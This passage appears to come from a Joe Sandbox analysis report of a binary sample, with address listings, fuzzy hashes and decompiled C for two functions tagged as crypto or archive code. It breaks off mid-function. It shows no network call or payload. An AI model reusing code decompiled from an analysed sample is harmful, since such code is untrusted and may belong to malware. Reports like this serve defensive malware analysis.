                                                                                                                    0x00b5cd4a
                                                                                                                    0x00b5cd53
                                                                                                                    0x00b5cd56
                                                                                                                    0x00b5cd59
                                                                                                                    0x00b5cd5e
                                                                                                                    0x00b5cd69
                                                                                                                    0x00b5cd6a
                                                                                                                    0x00b5cd6a
                                                                                                                    0x00b5cd6f
                                                                                                                    0x00b5cd73
                                                                                                                    0x00b5cd7a
                                                                                                                    0x00b5cd7f
                                                                                                                    0x00b5cd81
                                                                                                                    0x00b5cd84
                                                                                                                    0x00b5cd89
                                                                                                                    0x00b5cd91
                                                                                                                    0x00b5cd99
                                                                                                                    0x00b5cd99
                                                                                                                    0x00b5cd9f
                                                                                                                    0x00b5cda4
                                                                                                                    0x00b5cda9
                                                                                                                    0x00b5cdac
                                                                                                                    0x00b5cdaf
                                                                                                                    0x00b5cdb1
                                                                                                                    0x00b5cdb3
                                                                                                                    0x00b5cdb6
                                                                                                                    0x00b5ce8e
                                                                                                                    0x00b5ce99
                                                                                                                    0x00b5cea1
                                                                                                                    0x00b5cea5
                                                                                                                    0x00b5ceaa
                                                                                                                    0x00000000
                                                                                                                    0x00b5cdbc
                                                                                                                    0x00b5cdbc
                                                                                                                    0x00b5cdbc
                                                                                                                    0x00b5cdbc
                                                                                                                    0x00b5cdbf
                                                                                                                    0x00b5cdc2
                                                                                                                    0x00b5cdc5
                                                                                                                    0x00b5cdc8
                                                                                                                    0x00b5cdcc
                                                                                                                    0x00b5cdcf
                                                                                                                    0x00b5cdd9
                                                                                                                    0x00b5cdd9
                                                                                                                    0x00b5cdd1
                                                                                                                    0x00b5cdd4
                                                                                                                    0x00b5cdd4
                                                                                                                    0x00b5cddb
                                                                                                                    0x00b5cddd
                                                                                                                    0x00b5ce33
                                                                                                                    0x00b5ce37
                                                                                                                    0x00b5ce3a
                                                                                                                    0x00b5ce44
                                                                                                                    0x00b5ce44
                                                                                                                    0x00b5ce3c
                                                                                                                    0x00b5ce3f
                                                                                                                    0x00b5ce3f
                                                                                                                    0x00b5ce46
                                                                                                                    0x00b5ce4b
                                                                                                                    0x00b5ce4e
                                                                                                                    0x00b5ce51
                                                                                                                    0x00b5ce5e
                                                                                                                    0x00b5ce5e
                                                                                                                    0x00b5ce53
                                                                                                                    0x00b5ce59
                                                                                                                    0x00b5ce59
                                                                                                                    0x00b5ce60
                                                                                                                    0x00b5ce63
                                                                                                                    0x00b5ce66
                                                                                                                    0x00b5ce6a
                                                                                                                    0x00b5ce6a
                                                                                                                    0x00b5ce6a
                                                                                                                    0x00b5cddf
                                                                                                                    0x00b5cddf
                                                                                                                    0x00b5cde5
                                                                                                                    0x00b5cdec
                                                                                                                    0x00b5cdee
                                                                                                                    0x00b5cdf3
                                                                                                                    0x00b5cdf5
                                                                                                                    0x00b5cdfb
                                                                                                                    0x00b5cdfe
                                                                                                                    0x00b5ce04
                                                                                                                    0x00b5ce16
                                                                                                                    0x00b5ce16
                                                                                                                    0x00b5ce18
                                                                                                                    0x00b5ce18
                                                                                                                    0x00b5ce1a
                                                                                                                    0x00b5ce1d
                                                                                                                    0x00b5ce28
                                                                                                                    0x00b5ce28
                                                                                                                    0x00b5ce2b
                                                                                                                    0x00b5ce2e
                                                                                                                    0x00000000
                                                                                                                    0x00b5ce2e
                                                                                                                    0x00b5ce06
                                                                                                                    0x00b5ce0c
                                                                                                                    0x00b5ce0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5ce11
                                                                                                                    0x00b5ce13
                                                                                                                    0x00000000
                                                                                                                    0x00b5ce13
                                                                                                                    0x00b5ce6e
                                                                                                                    0x00b5ce6e
                                                                                                                    0x00b5ce72
                                                                                                                    0x00b5ce74
                                                                                                                    0x00b5ce7a
                                                                                                                    0x00b5ce7a
                                                                                                                    0x00b5ce7d
                                                                                                                    0x00b5ce81
                                                                                                                    0x00b5ce82
                                                                                                                    0x00b5ce85
                                                                                                                    0x00b5ce85
                                                                                                                    0x00000000
                                                                                                                    0x00b5cdbf
                                                                                                                    0x00b5cdb6
                                                                                                                    0x00b5ca39
                                                                                                                    0x00b5ca3b
                                                                                                                    0x00b5ca41
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5ca45
                                                                                                                    0x00b5ca4a
                                                                                                                    0x00b5ca50
                                                                                                                    0x00b5ca53
                                                                                                                    0x00b5ca55
                                                                                                                    0x00b5ca5c
                                                                                                                    0x00b5ca5c
                                                                                                                    0x00b5ca5c
                                                                                                                    0x00000000
                                                                                                                    0x00b5ca5c
                                                                                                                    0x00b5c8f0
                                                                                                                    0x00b5c8f0
                                                                                                                    0x00b5c8f3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b5c8f5
                                                                                                                    0x00b5c8fb
                                                                                                                    0x00b5c903
                                                                                                                    0x00b5c906
                                                                                                                    0x00b5c909
                                                                                                                    0x00b5c90c
                                                                                                                    0x00b5c90d
                                                                                                                    0x00b5c90e
                                                                                                                    0x00b5c914
                                                                                                                    0x00b5c91a
                                                                                                                    0x00b5c921
                                                                                                                    0x00b5c924
                                                                                                                    0x00b5c946
                                                                                                                    0x00b5c948
                                                                                                                    0x00b5c953
                                                                                                                    0x00b5c956
                                                                                                                    0x00b5c959
                                                                                                                    0x00b5c959
                                                                                                                    0x00000000
                                                                                                                    0x00b5c959
                                                                                                                    0x00b5c926
                                                                                                                    0x00b5c92d
                                                                                                                    0x00b5c932
                                                                                                                    0x00b5cefd
                                                                                                                    0x00b5cf03
                                                                                                                    0x00b5cf0b
                                                                                                                    0x00b5cf0b

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B5C892
                                                                                                                      • Part of subcall function 00B5C560: __EH_prolog.LIBCMT ref: 00B5C565
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B98128), ref: 00B5CD6A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2366012087-0
                                                                                                                    • Opcode ID: 5fcdb27c0daf56c69f22245280fda2aa4b8ae0d7b0ddc2220d062cc3cfbd4735
                                                                                                                    • Instruction ID: f63b1d94776ca9529b6bb111d5083fb4ebae94d28a23c6ddbf029cdefb704217
                                                                                                                    • Opcode Fuzzy Hash: 5fcdb27c0daf56c69f22245280fda2aa4b8ae0d7b0ddc2220d062cc3cfbd4735
                                                                                                                    • Instruction Fuzzy Hash: 7E321670900349DFCB15DFA4C591BADBBF2FF04305F1481E9E819AB292D770AA59CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B7C360 Relevance: 1.9, APIs: 1, Instructions: 356COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00B7C360(intOrPtr* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr* _t150;
				signed int _t151;
				unsigned int _t152;
				void* _t155;
				signed int _t159;
				signed int _t163;
				signed int _t165;
				void* _t171;
				void* _t175;
				void* _t179;
				signed int _t182;
				signed int _t184;
				void* _t187;
				signed int _t189;
				unsigned int _t192;
				void* _t199;
				intOrPtr _t201;
				short _t208;
				signed int _t212;
				signed int _t218;
				unsigned int _t219;
				signed int _t220;
				signed int _t226;
				signed int _t230;
				intOrPtr _t243;
				signed int _t267;
				signed int _t272;
				unsigned int _t277;
				void* _t281;
				signed int _t286;
				signed int _t294;
				signed int _t296;
				void* _t302;
				intOrPtr* _t309;
				void* _t310;

				_t309 = __ecx;
				_t150 = __ecx + 0xa8;
				_t199 = __ecx + 8;
				 *_t150 = 0;
				 *((intOrPtr*)(_t150 + 4)) = 0;
				_t294 =  *(_t199 + 0x7c);
				_t274 =  *(_t199 + 0x78);
				 *(_t310 + 0x10) = __edx;
				 *(_t310 + 0x20) = _t199;
				 *((intOrPtr*)(_t310 + 0x14)) = _t150;
				 *(_t310 + 0x2c) = 1;
				 *((intOrPtr*)(_t310 + 0x30)) = 0;
				if(( *(_t199 + 0x78) & _t294) == 0xffffffff) {
					L16:
					_t274 = 0;
					_t294 = 0x40000000;
				} else {
					_t272 =  *(_t199 + 0x90) &  *(_t199 + 0x94);
					if(_t272 == 0xffffffff) {
						goto L16;
					} else {
						 *((intOrPtr*)(_t310 + 0x3c)) = L00B7F310( *(_t199 + 0x90),  *(_t199 + 0x94), _t274, _t294);
						 *(_t310 + 0x40) = _t272;
						if(L00B7F440(_t274, _t294, _t197, _t272) !=  *(_t199 + 0x90)) {
							L4:
							 *(_t310 + 0x2c) =  *(_t310 + 0x2c) + 1;
							asm("adc dword [esp+0x30], 0x0");
						} else {
							_t314 = _t272 -  *(_t199 + 0x94);
							if(_t272 !=  *(_t199 + 0x94)) {
								goto L4;
							}
						}
						_t150 =  *((intOrPtr*)(_t310 + 0x14));
					}
				}
				_push( *_t309);
				asm("adc ecx, esi");
				asm("adc ecx, 0x0");
				_push(_t294 >> 0xa);
				_t151 = L00B7B270(_t150, _t314,  *((intOrPtr*)(_t310 + 0x34)),  *((intOrPtr*)(_t310 + 0x3c)), _t274, _t294, ((_t294 << 0x00000020 | _t274) >> 0xa) + _t274 + 0x450);
				if(_t151 != 0) {
					L22:
					return _t151;
				} else {
					_t152 =  *(_t199 + 0x70) & 0x0000ffff;
					_t243 =  *0xb8fa20; // 0x587a37fd
					_t208 =  *0xb8fa24; // 0x5a
					 *((intOrPtr*)(_t310 + 0x34)) = _t243;
					 *((short*)(_t310 + 0x38)) = _t208;
					 *((char*)(_t310 + 0x3a)) = _t152 >> 8;
					 *(_t310 + 0x3b) = _t152;
					 *((intOrPtr*)(_t310 + 0x3c)) = E00B7E140(_t310 + 0x3a, 2);
					_t155 =  *((intOrPtr*)( *( *(_t310 + 0x10))))(0xc);
					asm("sbb eax, eax");
					_t151 =  ~(_t155 - 0xc) & 0x00000009;
					if(_t151 != 0) {
						goto L22;
					} else {
						if( *((intOrPtr*)(_t199 + 0x80)) <= 1) {
							_t296 =  *(_t310 + 0x78);
							_t159 =  *(_t199 + 0x7c);
							 *(_t310 + 0x18) = 0;
							 *(_t310 + 0x1c) = 0;
							 *((intOrPtr*)(_t310 + 0x48)) = 0;
							 *((intOrPtr*)(_t310 + 0x4c)) = 0;
							 *((intOrPtr*)(_t310 + 0x50)) = 0;
							 *((intOrPtr*)(_t310 + 0x54)) = 0;
							 *(_t310 + 0x78) = 0;
							_t277 =  *(_t199 + 0x78);
							 *(_t310 + 0x40) = 0xb7bf20;
							 *(_t310 + 0x44) = _t296;
							__eflags = (_t277 & _t159) - 0xffffffff;
							if((_t277 & _t159) == 0xffffffff) {
								L37:
								asm("sbb esi, esi");
								asm("sbb eax, eax");
								_t163 =  !( ~( *(_t310 + 0x78))) &  *(_t310 + 0x10);
								 *(_t310 + 0x24) =  ~_t296 & _t310 + 0x00000040;
								 *(_t310 + 0x2c) = _t163;
								while(1) {
									__eflags =  *(_t310 + 0x78);
									 *((intOrPtr*)(_t310 + 0x68)) = 0;
									if( *(_t310 + 0x78) == 0) {
										_t212 = 0;
										__eflags = 0;
									} else {
										_t212 =  *(_t309 + 0xdbc);
									}
									_push( *((intOrPtr*)(_t309 + 4)));
									_push( *_t309);
									_push(_t310 + 0x60);
									_push(_t310 + 0x34);
									_push( *((intOrPtr*)(_t310 + 0x34)));
									_push(_t199);
									_push(0);
									_push(0);
									_push( *((intOrPtr*)(_t310 + 0x88)));
									_push( *(_t310 + 0x40));
									_push( *(_t310 + 0x40));
									_push(_t212);
									_push(_t163);
									_push(_t309 + 0xb8);
									_t151 = L00B7BAF0();
									__eflags = _t151;
									if(_t151 != 0) {
										goto L22;
									}
									_t165 =  *(_t310 + 0x60);
									_t302 = ( ~_t165 & 0x00000003) + _t165;
									asm("adc edi, [esp+0x64]");
									__eflags =  *(_t310 + 0x78);
									 *((intOrPtr*)(_t310 + 0x38)) = 0;
									if(__eflags == 0) {
										L46:
										_push( *((intOrPtr*)(_t310 + 0x64)));
										_push(_t165);
										_t151 = L00B7B310( *(_t310 + 0x24),  *_t309, __eflags,  *(_t310 + 0x60),  *((intOrPtr*)(_t310 + 0x5c)));
										__eflags = _t151;
										if(_t151 == 0) {
											 *((intOrPtr*)(_t310 + 0x48)) =  *((intOrPtr*)(_t310 + 0x48)) +  *((intOrPtr*)(_t310 + 0x58));
											_t199 =  *(_t310 + 0x20);
											asm("adc [esp+0x4c], edx");
											 *((intOrPtr*)(_t310 + 0x50)) =  *((intOrPtr*)(_t310 + 0x50)) + _t302;
											asm("adc [esp+0x54], edi");
											__eflags =  *((intOrPtr*)(_t310 + 0x28)) - _t151;
											if(__eflags != 0) {
												goto L21;
											} else {
												_t163 =  *(_t310 + 0x2c);
												continue;
											}
										}
									} else {
										_t201 =  *((intOrPtr*)(_t310 + 0x68));
										_t171 =  *((intOrPtr*)( *( *(_t310 + 0x10))))(_t201);
										asm("sbb eax, eax");
										_t151 =  ~(_t171 - _t201) & 0x00000009;
										__eflags = _t151;
										if(_t151 == 0) {
											_t281 = _t302 - _t201;
											_t175 =  *((intOrPtr*)( *( *(_t310 + 0x10))))(_t281);
											asm("sbb eax, eax");
											_t151 =  ~(_t175 - _t281) & 0x00000009;
											__eflags = _t151;
											if(__eflags == 0) {
												_t165 =  *(_t310 + 0x60);
												goto L46;
											}
										}
									}
									goto L22;
								}
								goto L22;
							} else {
								__eflags =  *(_t199 + 0x8c);
								_t218 = 0 |  *(_t199 + 0x8c) > 0x00000000;
								 *(_t310 + 0x78) = _t218;
								__eflags = _t218;
								if(_t218 == 0) {
									goto L37;
								} else {
									_t219 = _t277;
									__eflags = _t219 - _t219;
									if(_t219 != _t219) {
										goto L15;
									} else {
										__eflags = 0 - _t159;
										if(0 != _t159) {
											goto L15;
										} else {
											_t220 = _t219 + (_t219 >> 0xa) + 0x50;
											 *(_t310 + 0x18) = _t220;
											__eflags = 0 - _t159;
											if(__eflags > 0) {
												L31:
												_t101 = _t220 + 0x400; // 0xb695a0
												_t179 = _t101;
												__eflags =  *(_t309 + 0xdbc);
												if( *(_t309 + 0xdbc) == 0) {
													L33:
													L00B7BFB0(_t309);
													_t286 =  *(_t310 + 0x18) + 0x400;
													_t182 =  *((intOrPtr*)( *((intOrPtr*)( *_t309))))();
													 *(_t309 + 0xdbc) = _t182;
													__eflags = _t182;
													if(_t182 != 0) {
														_t220 =  *(_t310 + 0x18);
														 *(_t309 + 0xdb8) = _t286;
														goto L36;
													} else {
														return 2;
													}
												} else {
													__eflags = _t179 -  *(_t309 + 0xdb8);
													if(_t179 ==  *(_t309 + 0xdb8)) {
														L36:
														_t184 =  *(_t309 + 0xdbc) + 0x400;
														__eflags = _t184;
														 *(_t310 + 0x18) = _t184;
														 *(_t310 + 0x1c) = _t220;
														goto L37;
													} else {
														goto L33;
													}
												}
											} else {
												if(__eflags < 0) {
													goto L15;
												} else {
													__eflags = _t220 - _t277;
													if(_t220 < _t277) {
														goto L15;
													} else {
														goto L31;
													}
												}
											}
										}
									}
								}
							}
						} else {
							if( *(_t309 + 0xef4) == 0) {
								 *(_t309 + 0xef4) = 1;
								E00B76860(1, _t309 + 0xef8);
							}
							_t267 =  *(_t310 + 0x10);
							 *(_t309 + 0xeec) =  *(_t199 + 0x70);
							_t187 = memcpy(_t199, _t199, 0x26 << 2);
							_t310 = _t310 + 0xc;
							 *(_t309 + 0xef0) = _t267;
							 *(_t309 + 0xf18) = _t187;
							 *((intOrPtr*)(_t309 + 0xf08)) =  *((intOrPtr*)(_t310 + 0x74));
							 *(_t309 + 0xf14) =  *(_t310 + 0x78);
							 *((intOrPtr*)(_t309 + 0xf0c)) = 0;
							 *((intOrPtr*)(_t309 + 0xf10)) = 0;
							 *((intOrPtr*)(_t309 + 0xf1c)) = _t310 + 0x2c;
							 *((intOrPtr*)(_t309 + 0xf20)) = _t309;
							_t189 =  *(_t199 + 0x78);
							_t226 =  *(_t199 + 0x7c);
							 *(_t310 + 0x2c) = E00B7C1C0;
							 *((intOrPtr*)(_t310 + 0x30)) = E00B7C2D0;
							if((_t189 & _t226) == 0xffffffff || (_t189 | _t226) == 0) {
								return 0xb;
							} else {
								_t192 =  *(_t199 + 0x78);
								 *(_t309 + 0xef8) = _t192;
								if(_t192 !=  *(_t199 + 0x78) || 0 !=  *(_t199 + 0x7c)) {
									L15:
									return 5;
								} else {
									_t230 = (_t192 >> 0xa) + _t192 + 0x450;
									 *(_t310 + 0x78) = _t230;
									__eflags = _t230 - _t192;
									if(_t230 < _t192) {
										goto L15;
									} else {
										__eflags =  *(_t309 + 0xdb8) - _t230;
										if( *(_t309 + 0xdb8) != _t230) {
											L00B7BFB0(_t309);
											_t230 =  *(_t310 + 0x78);
										}
										 *(_t309 + 0xdb8) = _t230;
										 *((intOrPtr*)(_t309 + 0xf04)) =  *((intOrPtr*)(_t309 + 0xa4));
										 *((intOrPtr*)(_t309 + 0xefc)) =  *((intOrPtr*)(_t199 + 0x84));
										 *((intOrPtr*)(_t309 + 0xf00)) =  *((intOrPtr*)(_t309 + 0xa0));
										_t151 = E00B769E0(_t309 + 0xef8);
										__eflags = _t151;
										if(__eflags == 0) {
											L21:
											_t151 = L00B7B3A0( *(_t310 + 0x18),  *(_t310 + 0x10), __eflags,  *(_t199 + 0x70) & 0x0000ffff);
										}
										goto L22;
									}
								}
							}
						}
					}
				}
			}








































                                                                                                                    0x00b7c365
                                                                                                                    0x00b7c369
                                                                                                                    0x00b7c370
                                                                                                                    0x00b7c373
                                                                                                                    0x00b7c375
                                                                                                                    0x00b7c378
                                                                                                                    0x00b7c37c
                                                                                                                    0x00b7c37f
                                                                                                                    0x00b7c387
                                                                                                                    0x00b7c38b
                                                                                                                    0x00b7c38f
                                                                                                                    0x00b7c397
                                                                                                                    0x00b7c39e
                                                                                                                    0x00b7c55d
                                                                                                                    0x00b7c55d
                                                                                                                    0x00b7c55f
                                                                                                                    0x00b7c3a4
                                                                                                                    0x00b7c3aa
                                                                                                                    0x00b7c3b3
                                                                                                                    0x00000000
                                                                                                                    0x00b7c3b9
                                                                                                                    0x00b7c3d2
                                                                                                                    0x00b7c3d6
                                                                                                                    0x00b7c3e5
                                                                                                                    0x00b7c3ef
                                                                                                                    0x00b7c3ef
                                                                                                                    0x00b7c3f4
                                                                                                                    0x00b7c3e7
                                                                                                                    0x00b7c3e7
                                                                                                                    0x00b7c3ed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7c3ed
                                                                                                                    0x00b7c3f9
                                                                                                                    0x00b7c3f9
                                                                                                                    0x00b7c3b3
                                                                                                                    0x00b7c400
                                                                                                                    0x00b7c40e
                                                                                                                    0x00b7c416
                                                                                                                    0x00b7c419
                                                                                                                    0x00b7c427
                                                                                                                    0x00b7c430
                                                                                                                    0x00b7c5db
                                                                                                                    0x00b7c5e2
                                                                                                                    0x00b7c436
                                                                                                                    0x00b7c436
                                                                                                                    0x00b7c43a
                                                                                                                    0x00b7c440
                                                                                                                    0x00b7c447
                                                                                                                    0x00b7c450
                                                                                                                    0x00b7c455
                                                                                                                    0x00b7c460
                                                                                                                    0x00b7c46d
                                                                                                                    0x00b7c479
                                                                                                                    0x00b7c480
                                                                                                                    0x00b7c482
                                                                                                                    0x00b7c485
                                                                                                                    0x00000000
                                                                                                                    0x00b7c48b
                                                                                                                    0x00b7c496
                                                                                                                    0x00b7c5f4
                                                                                                                    0x00b7c5f8
                                                                                                                    0x00b7c5fb
                                                                                                                    0x00b7c5ff
                                                                                                                    0x00b7c603
                                                                                                                    0x00b7c607
                                                                                                                    0x00b7c60b
                                                                                                                    0x00b7c60f
                                                                                                                    0x00b7c613
                                                                                                                    0x00b7c617
                                                                                                                    0x00b7c61e
                                                                                                                    0x00b7c626
                                                                                                                    0x00b7c62a
                                                                                                                    0x00b7c62d
                                                                                                                    0x00b7c6e5
                                                                                                                    0x00b7c6eb
                                                                                                                    0x00b7c6f5
                                                                                                                    0x00b7c6f9
                                                                                                                    0x00b7c6fd
                                                                                                                    0x00b7c701
                                                                                                                    0x00b7c710
                                                                                                                    0x00b7c710
                                                                                                                    0x00b7c715
                                                                                                                    0x00b7c71d
                                                                                                                    0x00b7c727
                                                                                                                    0x00b7c727
                                                                                                                    0x00b7c71f
                                                                                                                    0x00b7c71f
                                                                                                                    0x00b7c71f
                                                                                                                    0x00b7c72c
                                                                                                                    0x00b7c730
                                                                                                                    0x00b7c735
                                                                                                                    0x00b7c73a
                                                                                                                    0x00b7c73f
                                                                                                                    0x00b7c747
                                                                                                                    0x00b7c748
                                                                                                                    0x00b7c74a
                                                                                                                    0x00b7c74c
                                                                                                                    0x00b7c751
                                                                                                                    0x00b7c756
                                                                                                                    0x00b7c757
                                                                                                                    0x00b7c758
                                                                                                                    0x00b7c75f
                                                                                                                    0x00b7c760
                                                                                                                    0x00b7c765
                                                                                                                    0x00b7c767
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7c76d
                                                                                                                    0x00b7c77a
                                                                                                                    0x00b7c77c
                                                                                                                    0x00b7c780
                                                                                                                    0x00b7c785
                                                                                                                    0x00b7c789
                                                                                                                    0x00b7c7d5
                                                                                                                    0x00b7c7e0
                                                                                                                    0x00b7c7e1
                                                                                                                    0x00b7c7ec
                                                                                                                    0x00b7c7f1
                                                                                                                    0x00b7c7f3
                                                                                                                    0x00b7c7fd
                                                                                                                    0x00b7c805
                                                                                                                    0x00b7c809
                                                                                                                    0x00b7c80d
                                                                                                                    0x00b7c811
                                                                                                                    0x00b7c815
                                                                                                                    0x00b7c819
                                                                                                                    0x00000000
                                                                                                                    0x00b7c81f
                                                                                                                    0x00b7c81f
                                                                                                                    0x00000000
                                                                                                                    0x00b7c81f
                                                                                                                    0x00b7c819
                                                                                                                    0x00b7c78b
                                                                                                                    0x00b7c78f
                                                                                                                    0x00b7c79c
                                                                                                                    0x00b7c7a2
                                                                                                                    0x00b7c7a4
                                                                                                                    0x00b7c7a4
                                                                                                                    0x00b7c7a7
                                                                                                                    0x00b7c7b9
                                                                                                                    0x00b7c7bc
                                                                                                                    0x00b7c7c2
                                                                                                                    0x00b7c7c4
                                                                                                                    0x00b7c7c4
                                                                                                                    0x00b7c7c7
                                                                                                                    0x00b7c7d1
                                                                                                                    0x00000000
                                                                                                                    0x00b7c7d1
                                                                                                                    0x00b7c7c7
                                                                                                                    0x00b7c7a7
                                                                                                                    0x00000000
                                                                                                                    0x00b7c789
                                                                                                                    0x00000000
                                                                                                                    0x00b7c633
                                                                                                                    0x00b7c635
                                                                                                                    0x00b7c63b
                                                                                                                    0x00b7c63e
                                                                                                                    0x00b7c642
                                                                                                                    0x00b7c644
                                                                                                                    0x00000000
                                                                                                                    0x00b7c64a
                                                                                                                    0x00b7c64a
                                                                                                                    0x00b7c64e
                                                                                                                    0x00b7c650
                                                                                                                    0x00000000
                                                                                                                    0x00b7c656
                                                                                                                    0x00b7c656
                                                                                                                    0x00b7c658
                                                                                                                    0x00000000
                                                                                                                    0x00b7c65e
                                                                                                                    0x00b7c663
                                                                                                                    0x00b7c669
                                                                                                                    0x00b7c66d
                                                                                                                    0x00b7c66f
                                                                                                                    0x00b7c67f
                                                                                                                    0x00b7c67f
                                                                                                                    0x00b7c67f
                                                                                                                    0x00b7c685
                                                                                                                    0x00b7c68b
                                                                                                                    0x00b7c695
                                                                                                                    0x00b7c697
                                                                                                                    0x00b7c6a5
                                                                                                                    0x00b7c6ad
                                                                                                                    0x00b7c6af
                                                                                                                    0x00b7c6b5
                                                                                                                    0x00b7c6b7
                                                                                                                    0x00b7c6c8
                                                                                                                    0x00b7c6cc
                                                                                                                    0x00000000
                                                                                                                    0x00b7c6b9
                                                                                                                    0x00b7c6c5
                                                                                                                    0x00b7c6c5
                                                                                                                    0x00b7c68d
                                                                                                                    0x00b7c68d
                                                                                                                    0x00b7c693
                                                                                                                    0x00b7c6d2
                                                                                                                    0x00b7c6d8
                                                                                                                    0x00b7c6d8
                                                                                                                    0x00b7c6dd
                                                                                                                    0x00b7c6e1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7c693
                                                                                                                    0x00b7c671
                                                                                                                    0x00b7c671
                                                                                                                    0x00000000
                                                                                                                    0x00b7c677
                                                                                                                    0x00b7c677
                                                                                                                    0x00b7c679
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7c679
                                                                                                                    0x00b7c671
                                                                                                                    0x00b7c66f
                                                                                                                    0x00b7c658
                                                                                                                    0x00b7c650
                                                                                                                    0x00b7c644
                                                                                                                    0x00b7c49c
                                                                                                                    0x00b7c4a2
                                                                                                                    0x00b7c4aa
                                                                                                                    0x00b7c4b0
                                                                                                                    0x00b7c4b0
                                                                                                                    0x00b7c4b8
                                                                                                                    0x00b7c4bf
                                                                                                                    0x00b7c4ce
                                                                                                                    0x00b7c4ce
                                                                                                                    0x00b7c4d4
                                                                                                                    0x00b7c4de
                                                                                                                    0x00b7c4e4
                                                                                                                    0x00b7c4f0
                                                                                                                    0x00b7c4f6
                                                                                                                    0x00b7c4fc
                                                                                                                    0x00b7c502
                                                                                                                    0x00b7c508
                                                                                                                    0x00b7c50e
                                                                                                                    0x00b7c511
                                                                                                                    0x00b7c518
                                                                                                                    0x00b7c520
                                                                                                                    0x00b7c52b
                                                                                                                    0x00b7c5f1
                                                                                                                    0x00b7c539
                                                                                                                    0x00b7c539
                                                                                                                    0x00b7c53c
                                                                                                                    0x00b7c547
                                                                                                                    0x00b7c54e
                                                                                                                    0x00b7c55a
                                                                                                                    0x00b7c569
                                                                                                                    0x00b7c56e
                                                                                                                    0x00b7c575
                                                                                                                    0x00b7c579
                                                                                                                    0x00b7c57b
                                                                                                                    0x00000000
                                                                                                                    0x00b7c57d
                                                                                                                    0x00b7c57d
                                                                                                                    0x00b7c583
                                                                                                                    0x00b7c587
                                                                                                                    0x00b7c58c
                                                                                                                    0x00b7c58c
                                                                                                                    0x00b7c596
                                                                                                                    0x00b7c5a8
                                                                                                                    0x00b7c5b4
                                                                                                                    0x00b7c5ba
                                                                                                                    0x00b7c5c0
                                                                                                                    0x00b7c5c5
                                                                                                                    0x00b7c5c7
                                                                                                                    0x00b7c5c9
                                                                                                                    0x00b7c5d6
                                                                                                                    0x00b7c5d6
                                                                                                                    0x00000000
                                                                                                                    0x00b7c5c7
                                                                                                                    0x00b7c57b
                                                                                                                    0x00b7c547
                                                                                                                    0x00b7c52b
                                                                                                                    0x00b7c496
                                                                                                                    0x00b7c485

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldiv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3732870572-0
                                                                                                                    • Opcode ID: 42ad07c4946770bba830bfdd967b083c48a50f5786cc18cbaa54e581746b046c
                                                                                                                    • Instruction ID: 70f6e7a3670912aa979d6c563e42a75914263d2a07b3f7554290cfe2654adf81
                                                                                                                    • Opcode Fuzzy Hash: 42ad07c4946770bba830bfdd967b083c48a50f5786cc18cbaa54e581746b046c
                                                                                                                    • Instruction Fuzzy Hash: 06E16B716043458FCB24CF29C880AAABBE6FFD8314F14896EF8698B355D730E945CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B7E960 Relevance: 1.7, Strings: 1, Instructions: 468COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00B7E960(signed int* __ecx, intOrPtr __edx, char _a4) {
				char _v200;
				signed int* _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr _v296;
				unsigned int _v300;
				unsigned int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _t248;
				unsigned int _t252;
				void* _t259;
				void* _t269;
				void* _t272;
				char* _t274;
				signed int _t276;
				void* _t277;
				unsigned int _t284;
				signed int _t286;
				signed int _t296;
